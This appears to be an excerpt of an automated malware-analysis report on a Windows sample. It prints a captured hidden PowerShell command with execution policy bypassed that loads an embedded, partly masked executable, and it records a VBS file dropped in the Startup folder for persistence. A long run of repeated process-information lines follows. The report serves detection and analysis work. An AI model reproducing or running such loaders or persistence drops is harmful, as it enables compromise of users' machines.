Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFC08385234 push eax; retn 0023h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FFC08455F38 push edx; ret

Boot Survival

Drops VBS files to the startup folder

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs\:Zone.Identifier:$DATA			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
